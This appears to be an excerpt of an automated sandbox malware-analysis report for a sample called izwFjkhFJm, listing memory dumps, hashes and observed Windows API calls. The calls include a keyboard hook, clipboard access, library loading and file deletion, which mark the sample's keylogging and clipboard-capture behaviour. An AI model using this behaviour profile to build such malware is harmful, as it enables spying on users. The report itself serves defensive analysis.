                                                                                  • Source File: 0000000F.00000002.526443376.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_18e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 4b2914951164790b8118c08ac9a016ea0b789a2fb318d4be79a2dc1f1ba7543a
                                                                                  • Instruction ID: 8bcf516810bbc834de51c09dfbf5746f3dfc6d6e791d1c2300761e934ccf1880
                                                                                  • Opcode Fuzzy Hash: 4b2914951164790b8118c08ac9a016ea0b789a2fb318d4be79a2dc1f1ba7543a
                                                                                  • Instruction Fuzzy Hash: 5E4136B0D006199FDB10CFADC88879EBBF2EB49318F148129E815EB390D77499468F91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 18e75e5, API call LoadLibraryA in block 18e769b-18e76e7
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 018E76D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.526443376.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_18e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: d56b59c465ccf12e6e1243da235c9a559329d39bcba1cf53a897208d310afabf
                                                                                  • Instruction ID: 596250b401ada09bb8163056361d779aa1648fdf1e39a011992ce8f1913db76a
                                                                                  • Opcode Fuzzy Hash: d56b59c465ccf12e6e1243da235c9a559329d39bcba1cf53a897208d310afabf
                                                                                  • Instruction Fuzzy Hash: 104167B4D102199FDB10CFADC98879DBBF2AB48318F148529E805EB380D7789942CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 73ec628, API call OleGetClipboard in block 73ec628-73ed428
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard
                                                                                  • String ID:
                                                                                  • API String ID: 220874293-0
                                                                                  • Opcode ID: 4e989adef8798ae90db64e3d5906cc82e9351648edca811fd5da889b76786c22
                                                                                  • Instruction ID: f9c100af883c420a6e47478ae686c3818ceb77daa47225aad5b8b2dad49e51bd
                                                                                  • Opcode Fuzzy Hash: 4e989adef8798ae90db64e3d5906cc82e9351648edca811fd5da889b76786c22
                                                                                  • Instruction Fuzzy Hash: EA3123B0E10229EFDB10CF99C884BDEBBF5AB08314F248059E408BB390DBB46945CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 73ed384, API call OleGetClipboard in block 73ed3ea-73ed428
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard
                                                                                  • String ID:
                                                                                  • API String ID: 220874293-0
                                                                                  • Opcode ID: 9fdaffded9c84ad754a02bef374352dd74c9ea96cfb3dac47a0406e926b21054
                                                                                  • Instruction ID: 52d33d53f3aed4cc1fe7ea7db3671d98dcb98708a3376d75f3c55b2238e08a28
                                                                                  • Opcode Fuzzy Hash: 9fdaffded9c84ad754a02bef374352dd74c9ea96cfb3dac47a0406e926b21054
                                                                                  • Instruction Fuzzy Hash: 853114B4E10219EFDB10CF99C884BDDBBF5AB48314F248059E008BB394DB746945CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 73e76dc, API call DuplicateHandle in block 73e76dc-73e7df4
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,073E7D26,?,?,?,?,?), ref: 073E7DE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: b68b41527b46456ffc155e1b29f2009356bc8a30d641c92e20522a5fe0b4a6f4
                                                                                  • Instruction ID: d01263d172e89bfcd3a5f60206a26b41ba374e19c1d0836ec2043a6529dfa934
                                                                                  • Opcode Fuzzy Hash: b68b41527b46456ffc155e1b29f2009356bc8a30d641c92e20522a5fe0b4a6f4
                                                                                  • Instruction Fuzzy Hash: E8210AB5D002199FDB10CF99D984ADEBBF9EB48310F14841AE814A3350C374A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced: function starting at 73e7d5a, API call DuplicateHandle in block 73e7d60-73e7df4
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,073E7D26,?,?,?,?,?), ref: 073E7DE7
Memory Dump Source
• Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06FC18F0,00000000,00000000), ref: 06FC20C3
Memory Dump Source
• Source File: 0000000F.00000002.581540887.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6fc0000_izwFjkhFJm.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNELBASE(00000000), ref: 073E3A28
Memory Dump Source
• Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,06FCBB71,00000800), ref: 06FCBC02
Memory Dump Source
• Source File: 0000000F.00000002.581540887.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6fc0000_izwFjkhFJm.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,06FCBB71,00000800), ref: 06FCBC02
Memory Dump Source
• Source File: 0000000F.00000002.581540887.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6fc0000_izwFjkhFJm.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,073E9235), ref: 073EC2A7
Memory Dump Source
• Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 073E43A6
Memory Dump Source
• Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 073E43A6
Memory Dump Source
• Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 073ECC35
Memory Dump Source
• Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,073E9235), ref: 073EC2A7
Memory Dump Source
• Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 073ECC35
Memory Dump Source
• Source File: 0000000F.00000002.582087581.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_73e0000_izwFjkhFJm.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness

Uniqueness Score: -1.00%

                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525308947.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16dd000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction ID: 5cd5d7534c7225875addb4667ee7f67a193eb5e442e38f1df2f1b404309fb034
                                                                                  • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction Fuzzy Hash: 6411B176904280DFDB12DF54D9C4B16BF71FB84324F2886A9D8450B756C33AD456CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525582391.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16ed000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ea0fc80cb549e230918ecc6a47501d7840b27f092f69901688e36f6bbcdc59c
                                                                                  • Instruction ID: ba8305a1a0e49d5b2323dadd9bdeaa99c968264199e4c188a8cd2f7bcabb4e8a
                                                                                  • Opcode Fuzzy Hash: 3ea0fc80cb549e230918ecc6a47501d7840b27f092f69901688e36f6bbcdc59c
                                                                                  • Instruction Fuzzy Hash: 9B118B75504280CFDB06CF18DAC4B55BFA2FB84218F28C6ADD8494B796C33AD84ACB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525308947.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16dd000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93f961438c756a2a8f2528e7c3b35db89c7d3873985526e209f12d91cd87c7a7
                                                                                  • Instruction ID: 25115703373f32610515de0718b5fe7e29d1d53785baafd236de109400788d92
                                                                                  • Opcode Fuzzy Hash: 93f961438c756a2a8f2528e7c3b35db89c7d3873985526e209f12d91cd87c7a7
                                                                                  • Instruction Fuzzy Hash: 4E01F771D04344AAE722AA6ECC85767BF98DF45364F18841AED0D1B2C6C3799844C6B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.525308947.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_16dd000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dfe3550232a7a47a6877a5a52fd1a9f61a0f85b96b3a8fa09a4f9287ee5439b7
                                                                                  • Instruction ID: 6bc3a4cb1a2314c2e812957a5d495f90fcbf3d0f9f0771faa60aa535f64381eb
                                                                                  • Opcode Fuzzy Hash: dfe3550232a7a47a6877a5a52fd1a9f61a0f85b96b3a8fa09a4f9287ee5439b7
                                                                                  • Instruction Fuzzy Hash: C9F0C271904344BEE7228A5ADC84B62FF98EF41374F18C45AED081B386C3799844CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%